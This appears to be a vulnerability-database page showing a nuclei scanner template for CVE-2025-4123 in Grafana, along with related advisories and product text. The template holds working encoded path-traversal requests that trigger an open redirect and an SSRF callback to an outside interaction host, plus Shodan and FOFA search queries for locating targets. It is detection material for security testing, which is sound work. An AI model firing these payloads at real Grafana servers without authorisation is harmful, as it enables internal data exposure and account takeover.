Lucene search
+L

Grafana - XSS / Open Redirect / SSRF via Client Path Traversal

🗓️ 04 Aug 2026 15:05:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 105 Views

High severity Grafana vulnerability allows XSS, Open Redirect, and SSRF via path traversal.

Related
Refs
Code
ReporterTitlePublishedViews
Family
freebsd
FreeBSD
grafana -- XSS vulnerability
26 Apr 202500:00
freebsd
freebsd
FreeBSD
Grafana -- User deletion issue
15 Apr 202500:00
freebsd
githubexploit
GithubExploit
Exploit for Open Redirect in Grafana
4 Jun 202512:42
githubexploit
githubexploit
GithubExploit
Exploit for Open Redirect in Grafana
22 May 202515:34
githubexploit
githubexploit
GithubExploit
Exploit for Open Redirect in Grafana
6 Jun 202520:24
githubexploit
attackerkb
ATTACKERKB
CVE-2025-4123
22 May 202500:00
attackerkb
nessus
Tenable Nessus
Alibaba Cloud Linux 3 : 0074: grafana (ALINUX3-SA-2025:0074)
27 May 202500:00
nessus
nessus
Tenable Nessus
AlmaLinux 9 : grafana (ALSA-2025:7893)
26 May 202500:00
nessus
nessus
Tenable Nessus
AlmaLinux 8 : grafana (ALSA-2025:7894)
20 May 202500:00
nessus
nessus
Tenable Nessus
FreeBSD : grafana -- XSS vulnerability (45eb98d6-3b13-11f0-97f7-b42e991fc52e)
28 May 202500:00
nessus
Rows per page
id: CVE-2025-4123

info:
  name: Grafana - XSS / Open Redirect / SSRF via Client Path Traversal
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    An open redirect vulnerability in Grafana can be chained with other issues, such as XSS or SSRF, to increase impact. An attacker may exploit the redirect to target internal services or deliver malicious JavaScript, potentially leading to internal data exposure or account takeover.
  impact: |
    Attackers can exploit path traversal to achieve open redirect, XSS, or SSRF attacks, potentially leading to internal data exposure or account takeover.
  remediation: |
    Upgrade Grafana to the latest version that properly validates and sanitizes file paths in the render endpoint.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:L
    cvss-score: 7.6
    cve-id: CVE-2025-4123
    cwe-id: CWE-79,CWE-601
    epss-score: 0.98258
    epss-percentile: 0.99911
  reference:
    - https://medium.com/@Nightbloodz/grafana-cve-2025-4123-full-read-ssrf-account-takeover-d12abd13cd53
    - https://grafana.com/blog/2025/05/21/grafana-security-release-high-severity-security-fix-for-cve-2025-4123/
  metadata:
    verified: true
    max-request: 1
    shodan-query: product:"Grafana"
    fofa-query: app="Grafana"
  tags: cve,cve2025,grafana,redirect,unauth,oss,vkev,vuln

http:
  - raw:
      - |
        GET /render/public/..%252f%255C{{interactsh-url}}%252f%253F%252f..%252f.. HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /public/..%2F%5coast.pro%2F%3f%2F..%2F.. HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        name: open-redirect
        dsl:
          - status_code == 302 && contains(location, '/\\oast.pro/?/../../')

      - type: dsl
        name: ssrf
        dsl:
          - contains(interactsh_protocol, 'dns') && contains(content_type, 'image/png')
# digest: 4a0a00473045022100ba571517b13ff6130d9b33a70228c1d49b3e35bf321931d809c1cca6bad71b290220299e64927f9f83d4412cb28446b1e35f73707c11c2503a41f5de46e13d0eda81:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.5High risk
Vulners AI Score7.5
CVSS 3.16.1 - 7.6
EPSS0.98258
SSVC
105